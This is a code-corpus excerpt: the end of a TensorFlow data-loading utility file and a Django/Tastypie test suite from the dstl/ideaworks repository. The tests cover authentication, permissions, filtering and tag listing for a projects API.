with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def load_pretrained(filepath):
return np.load(filepath, encoding='bytes').item()
def get_epoch():
epoch_step = tf.Variable(0, name='epoch_step', trainable=False)
epoch_update = epoch_step.assign(epoch_step + 1)
return epoch_step, epoch_update
def load_imgs(train_img_dir, filelist):
def load_img(path):
_img = Image.open(path)
img = np.array(_img)
_img.close()
return img
_imgs = [os.path.join(train_img_dir, filename + ".png") for filename in filelist]
imgs = [load_img(_img) for _img in _imgs]
return imgs
def load_annots(train_annot_dir, filelist):
def load_annot(path):
#print(path)
annot = np.load(path, encoding='bytes')
#print("original dims: {}x{}".format(annot[0,0], annot[0,1]))
return annot
_annots = [os.path.join(train_annot_dir, filename + ".npy") for filename in filelist]
annots = [load_annot(_annot) for _annot in _annots]
return annots
def tf_Print(on, x, summarize=50, message=""):
if on:
x = tf.Print(x, [x, tf.shape(x)], summarize=summarize, message=message)
return x
def debug_print(on, *x):
if on:
print(x)
return x
|
mit
| -3,746,810,476,708,794,000 | 26.25 | 87 | 0.674618 | false |
dstl/ideaworks
|
backend/ideaworks/projectsapp/tests/project_tests.py
|
1
|
112560
|
# (c) Crown Copyright 2014 Defence Science and Technology Laboratory UK
# Author: Rich Brantingham
import copy
import time
import json
import urlparse
import datetime
from xml.dom.minidom import parseString
from xml.parsers.expat import ExpatError
from django.test import TestCase
from django.core import urlresolvers
from django.test import client
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from registration.models import RegistrationProfile
from tastypie_mongoengine import test_runner
import projectsapp.documents as documents
from projectsapp import api
from projectsapp import api_functions
class Test_Authentication_Base(test_runner.MongoEngineTestCase):
"""
Base class to handle functions common throughout tests
"""
api_name = 'v1'
c = client.Client()
def get_meta_and_objects(self, response):
content = json.loads(response.content)
return content['meta'], content['objects']
""" User Handling Functions """
def resourceListURI(self, resource_name):
return urlresolvers.reverse('api_dispatch_list', kwargs={'api_name': self.api_name, 'resource_name': resource_name})
def resourcePK(self, resource_uri):
match = urlresolvers.resolve(resource_uri)
return match.kwargs['pk']
def resourceDetailURI(self, resource_name, resource_pk):
return urlresolvers.reverse('api_dispatch_detail', kwargs={'api_name': self.api_name, 'resource_name': resource_name, 'pk': resource_pk})
def fullURItoAbsoluteURI(self, uri):
scheme, netloc, path, query, fragment = urlparse.urlsplit(uri)
return urlparse.urlunsplit((None, None, path, query, fragment))
def add_user(self, email=None, first_name=None, last_name=None):
""" Add users
Need all 3 optionals.s """
# Allow ability to add an email from tests
if email==None:
email = 'bob@example.com'
if first_name==None:
first_name = 'bob'
if last_name==None:
last_name = 'roberts'
# Register a new user
resp = self.c.post(reverse('registration_register'),
data={'email': email,
'first_name' : first_name, 'last_name' : last_name,
'organisation' : 'org', 'team' : 'team',
'password1': 'test_password', 'password2': 'test_password',
'tos': True})
# Get the profile of our new user to access the ACTIVATION key
profile = RegistrationProfile.objects.get(user__email=email)
# And now activate the profile using the activation key
resp = self.client.get(reverse('registration_activate',
args=(),
kwargs={'activation_key': profile.activation_key}))
# Give all other tests access to the user and API key
user = User.objects.get(email=email)
api_key = user.api_key.key
return user, api_key
def build_headers(self, user, api_key):
""" Build request headers for calls requiring authentication """
headers={"HTTP_AUTHORIZATION":"ApiKey %s:%s"%(user.username, api_key)}
return headers
def give_privileges(self, user, priv):
""" makes the user superuser | staff """
if priv.lower() == 'staff':
user.is_staff = True
elif priv.lower() == 'superuser':
user.is_superuser = True
else:
print 'failed to set privileges (%s) for user %s' % (priv, user)
user.save()
return user
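# --- Hedged sketch (not part of the original file): the header dict produced
# by build_headers() above looks like this made-up example:
#   {"HTTP_AUTHORIZATION": "ApiKey bob:204db7bcfafb2deb7506b89eb3b9b715b09905c8"}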
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Basic_Authentication_Functions(Test_Authentication_Base):
"""
Tests that clients can authenticate properly.
"""
def setUp(self):
# Add a user and build API key header
self.user_id, self.api_key = self.add_user()
self.headers = self.build_headers(self.user_id, self.api_key)
def test_no_auth_required_on_GET(self):
""" Authentication block on a post request """
# Don't actually use the headers in the call
response = self.c.get(self.resourceListURI('project'))
if settings.ANONYMOUS_VIEWING == True:
self.assertEquals(response.status_code, 200)
else:
self.assertEquals(response.status_code, 401)
def test_auth_block_a_POST(self):
""" Authentication block on a post request """
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json')
self.assertEquals(response.status_code, 401)
def test_auth_block_a_non_staff_POST(self):
""" Authorization blocks a POST request by a non-staff user """
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 401)
def test_auth_allow_staff_POST(self):
""" Authorization allows POST by staff user """
user_id, api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(user_id, priv='staff')
headers = self.build_headers(user_id, api_key)
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"related_ideas":["xcxcxcxcxcxcxcxcxcxcxcxcxcxcx", "xcxcxcxcxcxcxcxcxcxcxcxcxcxcx"],
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json', **headers)
self.assertEquals(response.status_code, 201)
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Simple_GET_Project_API(Test_Authentication_Base):
def setUp(self):
""" Insert documents to start with"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
docs = [{"title": "The first project.",
"description": "First project description in here.",
"status":"published",
"protective_marking" : self.pm },
{"title": "The second project.",
"description": "Second project description in here.",
"status":"published",
"protective_marking" : self.pm }
]
# Store the responses
self.doc_locations = []
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_get_to_check_failure_anon(self):
""" Test to check that new status code isn't backwards breaking"""
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url)
self.assertEquals(response.status_code, 200)
def test_get_to_check_failure_authenticated(self):
""" Test to check that new status code isn't backwards breaking for authenticated user"""
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url, **self.headers)
self.assertEquals(response.status_code, 200)
def test_get_to_check_failure_authenticated_admin(self):
""" Test to check that new status code isn't backwards breaking for authenticated ADMIN user"""
user_id, api_key = self.add_user()
user = self.give_privileges(user_id, priv='staff')
headers = self.build_headers(user_id, api_key)
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url, **headers)
self.assertEquals(response.status_code, 200)
def test_get_all_projects(self):
""" Retrieve all projects """
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
meta, content = self.get_meta_and_objects(response)
self.assertEquals(meta['total_count'], 2)
self.assertEquals(len(content), 2)
#TODO: Sort out xml tests
def test_get_xml_list(self):
""" Get an xml representation
This will ERROR rather than FAIL if it doesn't succeed."""
response = self.c.get('/api/%s/project/?format=xml'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
xml = parseString(response.content)
def test_get_xml_list_fail(self):
""" Get an xml representation - fails on content """
response = self.c.get('/api/%s/project/?format=xml'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
self.assertRaises(ExpatError, parseString, response.content+'<hello world')
def test_get_csv_list(self):
""" Get an xml representation - fails on content """
response = self.c.get('/api/%s/project/?format=csv'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
lines = response.content.split('\n')
self.assertEquals(len(lines), 4)
# Split up each line
line_items = []
for line in lines:
line = line.split(',')
line_items.append(line)
# Check that each of the lines is the same length
for i in range(len(line_items)-2):
self.assertEquals(len(line_items[i]), len(line_items[i+1]))
def test_get_wrong_resource(self):
""" Fail to retrieve resource because of incorrect name """
response = self.c.get('/api/%s/projectx'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 404)
def test_get_1_project(self):
""" Retrieve 1 project """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
def test_get_no_project(self):
""" Fail to retrieve an project """
pk = self.doc_locations[1].rstrip('/').split('/')[-1] + '_fake'
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 404)
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Simple_GET_Project_specifics(Test_Authentication_Base):
def setUp(self):
""" Insert documents to start with"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
docs = [{"title": "The first project.",
"description": "First project description in here.",
"protective_marking" : self.pm,
"status":"published",
"tags" : ["project", "physics"]
},
{"title": "The second project.",
"description": "Second project description in here.",
"protective_marking" : self.pm,
"status":"published",
"tags" : ["project", "another_tag"]
}
]
# Store the responses
self.doc_locations = []
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_get_project_tag_list(self):
""" Check that the tag list works OK """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
data = json.loads(response.content)['objects'][0]
self.assertEquals(data['tags'], ['project','another_tag'])
def test_get_project_detail_check_meta_mx_pm(self):
""" Checks that the detail levell has a meta.max_pm object """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
meta, objects = self.get_meta_and_objects(response)
self.assertTrue(meta.has_key('max_pm'))
def test_get_project_detail_check_meta_modified(self):
""" Checks that the detail levell has a meta.modified object """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
meta, objects = self.get_meta_and_objects(response)
self.assertTrue(meta.has_key('modified'))
#@utils.override_settings(DEBUG=True)
class Test_Filtered_GET_Project_API(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# 2 more users
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
user_id3, api_key3 = self.add_user(email='sue@sue.com', first_name='sue', last_name='mcgrew')
self.headers3 = self.build_headers(user_id3, api_key3)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The third project.",
"description": "third project description in here.",
"tags" : ["physics","maths","geography"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Forth project.",
"description": "forth project description in here.",
"tags" : ["physics","maths"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Fifth project.",
"description": "fifth project description in here.",
"tags" : ["physics", "history"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": []},
{"title": "The Sixth project.",
"description": "fifth project description in here.",
"tags" : ["history", "design"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": []}
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
backs_uri = project_url + 'backs/'
backs = [{"comment" : {"title":"very good project. I support."}}]
for back in backs:
back_resp = self.c.post(backs_uri, json.dumps(back), content_type='application/json', **self.headers2)
self.assertEquals(back_resp.status_code, 201)
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers3)
self.assertEquals(comment_resp.status_code, 201)
x += 1
time.sleep(1)
response = self.c.get(self.resourceListURI('project')+'?data_level=less', **self.headers)
def test_filter_by_comment_count_GTE(self):
""" GTE filter on comment count """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?comment_count__gte=3', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 4)
self.assertEqual(meta['total_count'], 4)
def test_filter_by_comment_count_LTE(self):
""" less than or eq filter on comment_count """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?comment_count__lte=2', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_filter_by_1tag_all_doc(self):
""" Tag Filter - catch all documents with 1 tag """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags=physics', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 5)
self.assertEqual(meta['total_count'], 5)
def test_filter_by_1tag_1_doc(self):
""" Range filter on comment count """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=more&tags=english', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_filter_by_1tag_1_doc_exact(self):
""" Range filter on comment count """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=more&tags=english', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_filter_by_multiple_tags_OR(self):
""" There is 1 doc with an english tag and 1 with a history tag. This should get those 2. """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english', 'history']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags__in=english,history', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 3)
self.assertEqual(meta['total_count'], 3)
def test_filter_by_multiple_tags_check_post_sorting(self):
""" A list of tags in the q parameter matches exactly
the code for this is a modification that sorts the results of an __in query"""
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english', 'history']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags__in=physics,history,design', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 6)
self.assertEqual(meta['total_count'], 6)
self.assertEquals(objects[0]['tags'], ["physics","history"])
self.assertEquals(objects[1]['tags'], ["history","design"])
#@utils.override_settings(DEBUG=True)
class Test_Filtered_GET_Project_API_modified_status(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The third project.",
"description": "third project description in here.",
"tags" : ["physics","maths","geography"],
"protective_marking":self.pm,
"status" : "draft",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Forth project.",
"description": "forth project description in here.",
"tags" : ["physics","maths"],
"protective_marking":self.pm,
"status" : "draft",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Fifth project.",
"description": "fifth project description in here.",
"tags" : ["physics", "history"],
"protective_marking":self.pm,
"status" : "hidden",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Sixth project.",
"description": "fifth project description in here.",
"tags" : ["history", "design"],
"protective_marking":self.pm,
"status" : "deleted",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_staff_filter_by_status_published(self):
""" Get projects which have been published -accessed by staff user """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=published', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_filter_by_status_published(self):
""" Get projects which have been published - accessed by non-staff user"""
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=published', **self.headers2)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_staff_filter_by_status_draft(self):
""" Get projects which have been draft """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=draft', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_staff_filter_by_status_deleted(self):
""" Get projects which have been deleted """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=deleted', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_staff_filter_by_status_hidden(self):
""" Get projects which have been hidden """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=hidden', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_staff_filter_by_status_multiple(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=published,draft', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 4)
self.assertEqual(meta['total_count'], 4)
def test_staff_filter_by_status_multiple_2(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=hidden,deleted', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_non_staff_filter_by_status_multiple_2(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=hidden,deleted', **self.headers2)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 0)
self.assertEqual(meta['total_count'], 0)
def test_no_status_provided(self):
""" Non-authoring user can only see objects with a published status """
diff_user, diff_user_api_key = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
diff_headers = self.build_headers(diff_user, diff_user_api_key)
# Retrieve all results
response = self.c.get(self.resourceListURI('project'), **diff_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
#@utils.override_settings(DEBUG=True)
class Test_POST_Project_API(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3,
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"]
}
def test_POST_simple(self):
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status":"published",
"related_ideas": []
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta = json.loads(response.content)['meta']
objects = json.loads(response.content)['objects']
# Top level checks
self.assertEquals(meta['total_count'], 1)
self.assertEquals(len(objects), 1)
def test_POST_simple_usercheck(self):
""" Test that created and user get automatically added"""
doc = {"title": "The project.",
"description": "Project description in here.",
"status":"published",
"protective_marking" : self.pm,
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
# Field checks
self.assertTrue(datetime.datetime.strptime(objects[0]['created'], '%Y-%m-%dT%H:%M:%S.%f') < datetime.datetime.utcnow())
self.assertEquals(objects[0]['user'], self.user.username)
def test_PUT_simple(self):
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"status":"published",
"protective_marking" : self.pm,
"related_ideas":[]
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
project1_url = response['location']
# PUT an updated document to the project's detail URI
new_title = {"title":"the first project, much improved.",
"status":"published",
"protective_marking" : self.pm
}
response = self.c.put(project1_url, json.dumps(new_title), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 204)
def test_POST_add_comments(self):
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status" : "published",
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Grab the location of the new project
main_project = response['location']
# Now check it's there via the URL
# Without the trailing slash results in 301 status_code
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
comment_1 = comments_uri + '100/'
response = self.c.get(comment_1, **self.headers)
self.assertEquals(response.status_code, 404)
# Try adding a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
new_comment_uri = resp['location']
# Now make sure there is exactly 1 comment
response = self.c.get(comments_uri, **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['total_count'], 1)
self.assertEquals(objects[0]['user'], self.user.username)
def test_POST_add_comment_to_unpublished_project(self):
""" Comments are only permitted against projects with status=published
This checks that a comment will fail where status=draft"""
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status" : "draft",
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Grab the location of the new project
main_project = response['location']
# Now check it's there via the URL
# Without the trailing slash results in 301 status_code
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
comment_1 = comments_uri + '100/'
response = self.c.get(comment_1, **self.headers)
self.assertEquals(response.status_code, 404)
# Try adding a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
self.assertEquals(resp.status_code, 400)
self.assertEquals(json.loads(resp.content)['error'], 'User can only comment on projects with status=published.')
## Editing tags
"""
In shifting from an embeddedfieldlist to a simple list(string()) field
for tags, I've dropped the ability to POST/PUT/PATCH the tags array.
To edit the tags, the client has to extract the entire document (or the editable parts)
and then PUT the new document back (which includes the tags).
"""
#@utils.override_settings(DEBUG=True)
class Test_GET_tags(Test_Authentication_Base):
def setUp(self):
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
def test_get_tag_list(self):
""" Tests retrieval of tags"""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status":"published", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status":"published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status":"published", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status":"published", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check there are 4 tags total
response = self.c.get(self.resourceListURI('tag'), **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(len(tags), 4)
def test_get_tag_list_order_by_default(self):
""" Tests retrieval of tags with an extra aggregate term for sorting."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.","status":"published", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.","status":"published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.","status":"published", "tags" : ["project", "projectworks"]},
{"title": "Third project.","status":"published", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check the specific ordering of the tags
response = self.c.get(self.resourceListURI('tag'), **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(tags[0]['text'], 'project')
self.assertEquals(tags[1]['text'], 'projectworks')
self.assertEquals(tags[2]['text'], 'physics')
self.assertEquals(tags[3]['text'], 'rugby')
def test_get_tag_list_status_single_filter(self):
""" Filter which documents get read for tags based on status."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status" : "draft", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status" : "published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status" : "hidden", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status" : "deleted", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check the specific ordering of the tags
params = '?status=hidden'
response = self.c.get(self.resourceListURI('tag')+params, **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(len(tags), 2)
def test_get_tag_list_status_multiple_statuses(self):
""" Filter which documents get read for tags based on status."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status" : "draft", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status" : "published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status" : "hidden", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status" : "deleted", "tags" : ["new_project_tag"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
resp = self.c.get(self.resourceListURI('project'))
# Check the specific ordering of the tags
params = '?status=hidden,deleted'
response = self.c.get(self.resourceListURI('tag')+params, **self.headers)
tags = json.loads(response.content)['objects']
